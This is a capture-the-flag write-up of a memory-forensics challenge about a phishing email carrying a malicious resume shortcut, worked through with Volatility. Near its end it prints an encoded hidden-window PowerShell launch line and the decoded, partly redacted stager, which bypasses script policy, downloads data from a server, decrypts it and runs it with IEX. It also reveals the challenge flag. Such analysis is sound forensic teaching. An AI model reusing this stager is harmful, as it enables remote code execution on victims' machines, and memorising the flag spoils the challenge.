
Suspicious traffic was detected from a recruiter's virtual PC. A memory dump of the offending VM was captured before it was removed from the network for imaging and analysis. Our recruiter mentioned he received an email from someone regarding their resume. A copy of the email was recovered and is provided for reference. Find and decode the source of the malware to find the flag.

  1. Download files!

  2. Install Volatility

  3. Install Thunderbird

  4. Get some information on the files

└─$ cat imageinfo.txt 
          Suggested Profile(s) : Win7SP1x64, Win7SP0x64, Win2008R2SP0x64, Win2008R2SP1x64_23418, Win2008R2SP1x64, Win7SP1x64_23418
                     AS Layer1 : WindowsAMD64PagedMemory (Kernel AS)
                     AS Layer2 : VirtualBoxCoreDumpElf64 (Unnamed AS)
                     AS Layer3 : FileAddressSpace (/home/infosec/dumps/mem_dumps/01/flounder-pc-memdump.elf)
                      PAE type : No PAE
                           DTB : 0x187000L
                          KDBG : 0xf800027fe0a0L
          Number of Processors : 2
     Image Type (Service Pack) : 1
                KPCR for CPU 0 : 0xfffff800027ffd00L
                KPCR for CPU 1 : 0xfffff880009eb000L
             KUSER_SHARED_DATA : 0xfffff78000000000L
           Image date and time : 2017-10-04 18:07:30 UTC+0000
     Image local date and time : 2017-10-04 11:07:30 -0700
└─$ file flounder-pc-memdump.elf 
flounder-pc-memdump.elf: ELF 64-bit LSB core file, x86-64, version 1 (SYSV)
└─$ file Resume.eml             
Resume.eml: SMTP mail, ASCII text, with CRLF line terminators
└─$ strings Resume.eml                     
Return-Path: <bloodworm@madlab.lcl>
Delivered-To: madlab.lcl-flounder@madlab.lcl
Received: (qmail 2609 invoked by uid 105); 3 Oct 2017 02:30:24 -0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
Date: Mon, 02 Oct 2017 22:30:24 -0400
From: Brian Loodworm <bloodworm@madlab.lcl>
To: flounder@madlab.lcl
Subject: Resume
Organization: HackTheBox
Message-ID: <add77ed2ac38c3ab639246956c25b2c2@madlab.lcl>
X-Sender: bloodworm@madlab.lcl
Received: from mail.madlab.lcl (HELO mail.madlab.lcl) (
 by mail.madlab.lcl (qpsmtpd/0.96) with ESMTPSA (ECDHE-RSA-AES256-GCM-SHA384 encrypted); Mon, 02 Oct 2017 22:30:24 -0400
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII
Hi Frank, someone told me you would be great to review my resume..
Could you have a look? [1] 
Content-Transfer-Encoding: quoted-printable
Content-Type: text/html; charset=UTF-8
<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3DUTF-8" /></head><body style=3D'font-size: 10pt; font-family: Verdana,Gen=
<div class=3D"pre" style=3D"margin: 0; padding: 0; font-family: monospace">=
<br /> Hi Frank, someone told me you would be great to review my resume.. c=
uold you have a look?<br /> <br /><a href=3D"

Let's use Volatility!

└─$ python3 ~/Tools/volatility3-1.0.0/ -f flounder-pc-memdump.elf windows.pstree.PsTree                                                                                                                                            2 ⨯
Volatility 3 Framework 1.0.0
Progress:  100.00               PDB scanning finished                                                                                              
PID     PPID    ImageFileName   Offset(V)       Threads Handles SessionId       Wow64   CreateTime      ExitTime                                                         
4       0       System  0xfa8000839060  83      477     N/A     False   2017-10-04 18:04:27.000000      N/A                                                                                                                                  
* 272   4       smss.exe        0xfa8000839060  2       30      N/A     False   2017-10-04 18:04:27.000000      N/A
348     328     csrss.exe       0xfa8000839060  9       416     0       False   2017-10-04 18:04:29.000000      N/A
376     328     wininit.exe     0xfa8000839060  3       77      0       False   2017-10-04 18:04:29.000000      N/A
* 500   376     lsm.exe 0xfa8000839060  11      150     0       False   2017-10-04 18:04:30.000000      N/A
* 476   376     services.exe    0xfa8000839060  11      201     0       False   2017-10-04 18:04:29.000000      N/A
** 384  476     svchost.exe     0xfa8000839060  17      386     0       False   2017-10-04 18:04:30.000000      N/A
*** 432 384     winlogon.exe    0xfa8000839060  4       112     1       False   2017-10-04 18:04:29.000000      N/A
*** 396 384     csrss.exe       0xfa8000839060  9       283     1       False   2017-10-04 18:04:29.000000      N/A
**** 2772       396     conhost.exe     0xfa8000839060  2       55      1       False   2017-10-04 18:06:58.000000      N/A
** 868  476     svchost.exe     0xfa8000839060  21      429     0       False   2017-10-04 18:04:30.000000      N/A
*** 2020        868     dwm.exe 0xfa8000839060  4       72      1       False   2017-10-04 18:04:41.000000      N/A
** 900  476     svchost.exe     0xfa8000839060  41      977     0       False   2017-10-04 18:04:30.000000      N/A
** 1092 476     svchost.exe     0xfa8000839060  19      321     0       False   2017-10-04 18:04:31.000000      N/A
** 1704 476     SearchIndexer.  0xfa8000839060  16      734     0       False   2017-10-04 18:04:47.000000      N/A
*** 1960        1704    SearchProtocol  0xfa8000839060  6       311     0       False   2017-10-04 18:04:48.000000      N/A
*** 812 1704    SearchFilterHo  0xfa8000839060  4       92      0       False   2017-10-04 18:04:48.000000      N/A
** 2120 476     svchost.exe     0xfa8000839060  12      335     0       False   2017-10-04 18:06:32.000000      N/A
** 2248 476     wmpnetwk.exe    0xfa8000839060  18      489     0       False   2017-10-04 18:06:33.000000      N/A
** 600  476     svchost.exe     0xfa8000839060  12      360     0       False   2017-10-04 18:04:30.000000      N/A
*** 592 600     WmiPrvSE.exe    0xfa8000839060  9       127     0       False   2017-10-04 18:06:35.000000      N/A
*** 2924        600     WmiPrvSE.exe    0xfa8000839060  10      204     0       False   2017-10-04 18:06:26.000000      N/A
** 1196 476     svchost.exe     0xfa8000839060  28      333     0       False   2017-10-04 18:04:31.000000      N/A
** 664  476     VBoxService.ex  0xfa8000839060  12      118     0       False   2017-10-04 18:04:30.000000      N/A
** 1052 476     spoolsv.exe     0xfa8000839060  13      277     0       False   2017-10-04 18:04:31.000000      N/A
** 728  476     svchost.exe     0xfa8000839060  7       270     0       False   2017-10-04 18:04:30.000000      N/A
** 1720 476     taskhost.exe    0xfa8000839060  8       148     1       False   2017-10-04 18:04:36.000000      N/A
** 1840 476     sppsvc.exe      0xfa8000839060  4       145     0       False   2017-10-04 18:04:37.000000      N/A
** 792  476     svchost.exe     0xfa8000839060  21      443     0       False   2017-10-04 18:04:30.000000      N/A
** 988  476     svchost.exe     0xfa8000839060  13      286     0       False   2017-10-04 18:04:30.000000      N/A
* 492   376     lsass.exe       0xfa8000839060  8       590     0       False   2017-10-04 18:04:30.000000      N/A
2044    2012    explorer.exe    0xfa8000839060  36      926     1       False   2017-10-04 18:04:41.000000      N/A
* 496   2044    powershell.exe  0xfa8000839060  12      300     1       False   2017-10-04 18:06:58.000000      N/A
** 2752 496     powershell.exe  0xfa8000839060  20      396     1       False   2017-10-04 18:07:00.000000      N/A
* 1476  2044    VBoxTray.exe    0xfa8000839060  13      146     1       False   2017-10-04 18:04:42.000000      N/A
* 2812  2044    thunderbird.ex  0xfa8000839060  50      534     1       True    2017-10-04 18:06:24.000000      N/A

What about finding the resume file doing a file scan?

└─$ python3 ~/Tools/volatility3-1.0.0/ -f flounder-pc-memdump.elf windows.filescan.FileScan | grep -i resume                                                                                                                       1 ⨯
0x1e1f6200 100.0\Users\user\Desktop\resume.pdf.lnk      216
0x1e8feb70      \Users\user\Desktop\resume.pdf.lnk      216

Let's try get the file... Not completely clean this next command...

└─$ python3 ~/Tools/volatility3-1.0.0/ -f flounder-pc-memdump.elf windows.dumpfiles.DumpFiles --pid 496                                                                                                                            2 ⨯
Volatility 3 Framework 1.0.0
Progress:  100.00               PDB scanning finished                     
Cache   FileObject      FileName        Result

DataSectionObject       0xfa8001cfeb70  resume.pdf.lnk  file.0xfa8001cfeb70.0xfa80022ac740.DataSectionObject.resume.pdf.lnk.dat
SharedCacheMap  0xfa8001cfeb70  resume.pdf.lnk  file.0xfa8001cfeb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb
ImageSectionObject      0xfa80017f7be0  System.Transactions.dll file.0xfa80017f7be0.0xfa8000887c50.ImageSectionObject.System.Transactions.dll.img
ImageSectionObject      0xfa8000e2d400  System.Transactions.dll file.0xfa8000e2d400.0xfa8000887c50.ImageSectionObject.System.Transactions.dll.img
ImageSectionObject      0xfa8001664f20  ntdll.dll       file.0xfa8001664f20.0xfa800167a9a0.ImageSectionObject.ntdll.dll.img
<keyboard interrupt>

Cut out the rest - Those two first files are the ones!

String it out!

└─$ strings file.0xfa8001cfeb70.0xfa80017dcc60.SharedCacheMap.resume.pdf.lnk.vacb                                                                                                                                                      130 ⨯


powershell -noP -sta -w 1 -enc  JABHA<redacted>UAWAA=

More base64?

└─$ echo 'JABHA<redacted>AEUAWAA=' | base64 -d
$GroUPPOLiCYSEttINGs = [rEF].ASseMBLY.GEtTypE('System.Management.Automation.Utils')."GEtFIE`ld"('cachedGroupPolicySettings'<redacted>$flag='HTB{$_j0G_y0uR_M3m0rY_$}';$DatA=$WC.DoWNLoaDDATA($SeR+$t);$iv=$daTA[0..3];$DAta=$DaTa[4..$DAta.LenGTH];-JOIN[CHAr[]](& $R $datA ($IV+$K))|IEX 


Last updated